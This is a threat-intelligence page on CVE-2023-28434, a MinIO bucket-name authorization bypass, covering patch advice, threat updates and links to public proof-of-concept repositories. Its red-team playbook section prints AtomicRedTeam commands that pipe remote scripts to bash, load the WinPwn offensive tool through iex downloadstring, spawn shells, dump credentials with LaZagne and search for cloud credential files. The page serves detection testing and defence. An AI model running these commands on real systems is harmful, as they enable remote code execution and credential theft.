CVE-2023-28434
Overview
This vulnerability is an authorization bypass affecting Minio's metadata bucket name validation during PostPolicyBucket processing. The root cause is improper enforcement of bucket name checks, allowing crafted requests to circumvent restrictions. The flaw resides in the handling of API requests related to bucket object placement within the multi-cloud object storage framework.
Vulnerability Description
Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket`. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, enable browser API access and turn off `MINIO_BROWSER=off`.
Impact
An attacker with valid credentials and Console API access can insert objects into any bucket, potentially leading to unauthorized data manipulation or storage pollution. This requires a low-privileged account with broad S3 permissions and enabled Console API access. The business impact includes data integrity compromise and potential lateral movement within the storage environment, risking confidentiality and operational reliability of stored data.
Solution
Upgrade Minio to RELEASE.2023-03-20T20-16-18Z or later, where this issue is patched. As a temporary workaround, enable browser API access and disable the environment variable MINIO_BROWSER=off. Refer to Minio's security advisory GHSA-2pxw-r47w-4p8c and the related GitHub pull request #16849 for detailed patch instructions and updates.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Minio Multi-Cloud Object Storage framework stems from improper validation of bucket names during the processing of `PostPolicyBucket` requests. Specifically, the flaw allows an attacker to bypass metadata checks, enabling them to upload objects to any bucket within the storage system. This is particularly concerning because it requires only that the attacker possesses credentials with broad permissions, specifically those allowing access to all S3 buckets. The exploitation of this vulnerability hinges on the attacker having Console API access enabled, which can facilitate the submission of crafted requests that exploit the underlying issue.
Attack vectors for this vulnerability are primarily centered around authenticated users with sufficient permissions. An attacker could leverage their credentials to send specially crafted requests that manipulate the expected behavior of the Minio server. For instance, if an attacker has been granted access to a specific bucket, they could potentially exploit this weakness to upload sensitive data to unauthorized buckets, leading to data leakage or unauthorized data manipulation. Scenarios could include the unauthorized storage of malicious files, which could later be retrieved by other attackers or used in further attacks against the organization. The ability to bypass bucket restrictions also raises concerns about compliance with data protection regulations, as sensitive data could inadvertently be exposed.
The real-world impact of this vulnerability is significant, particularly for organizations relying on Minio for critical data storage. The business risks associated with this flaw include potential data breaches, loss of customer trust, and financial penalties stemming from non-compliance with data protection laws. If an attacker successfully exploits this vulnerability, they could not only compromise the integrity of the stored data but also potentially disrupt business operations by overwriting or deleting critical files. Furthermore, the reputational damage from such incidents can have long-lasting effects, making it imperative for organizations to address this vulnerability promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to apply the latest patches provided by Minio, which address this specific issue. Regularly updating software and monitoring for security advisories can help organizations stay ahead of emerging threats. Additionally, organizations should review their access control policies to ensure that only necessary permissions are granted to users. Limiting Console API access and enforcing the principle of least privilege can significantly reduce the attack surface. Implementing logging and monitoring solutions can also aid in detecting unusual activity, such as unauthorized uploads or access attempts to sensitive buckets.
In conclusion, the vulnerability within the Minio framework poses a serious threat to data integrity and security. With the potential for significant business impact and the ease of exploitation given the right permissions, organizations must prioritize addressing this issue. By adopting robust security practices, including timely patching, strict access controls, and continuous monitoring, organizations can mitigate the risks associated with this vulnerability and protect their critical data assets.
CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2023-28434 exploitation attempts, indicating a modest resurgence in adversary interest. Although the EPSS score shows a marginal decline, our telemetry reveals a discernible uptick in detection events, suggesting that threat actors may be probing for vulnerable Minio deployments with the appropriate permissions. The availability of new proof-of-concept exploits continues to lower the barrier for exploitation, potentially expanding the pool of attackers capable of leveraging this vulnerability. While ransomware usage linked to this flaw remains unconfirmed, the increased reconnaissance and exploitation attempts underscore the persistent risk to data integrity and confidentiality in affected environments. Consequently, the threat level remains high, with a subtle shift toward more active exploitation behavior that defenders must monitor closely.
Update 2 — August 16, 2026
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2023-28434, with our telemetry indicating a significant uptick in exploitation attempts targeting vulnerable Minio deployments. This surge coincides with the continued availability and visibility of new proof-of-concept exploits on public repositories, which lowers the technical barrier for adversaries seeking to leverage this vulnerability. Although the overall exploit trend remains stable in the short term, the qualitative increase in reconnaissance and attack behaviors suggests growing adversary interest and operational momentum. This development is particularly significant as it amplifies the risk to data integrity and confidentiality in affected environments, especially where permissive credentials and Console API access remain enabled. The threat landscape now reflects a heightened likelihood of successful exploitation attempts, warranting increased vigilance despite the absence of confirmed ransomware campaigns exploiting this flaw. Consequently, the risk level associated with CVE-2023-28434 has shifted toward a more active threat posture, underscoring the need for defenders to prioritize monitoring for anomalous activity linked to this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Minio | Minio | All |
cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
AbelChe/evil_minio
EXP for CVE-2023-28434 MinIO unauthorized to RCE
|
AbelChe | 320 | 39 | 2023-03-27 | View |
|
PoC
|
- | 0 | 0 | - | View |
Threat Feed
11 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-122 | Privilege Abuse |
30%
|
High | Medium | |
| CAPEC-233 | Privilege Escalation |
30%
|
— | — | |
| CAPEC-58 | Restful Privilege Elevation |
30%
|
High | High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-28434 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/minio/minio/security/advisories/GHSA-2pxw-r47w-4p8c |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/pull/16849 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/minio/minio/commit/67f4ba154a27a1b06e48bfabda38355a010dfca5 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-28434 |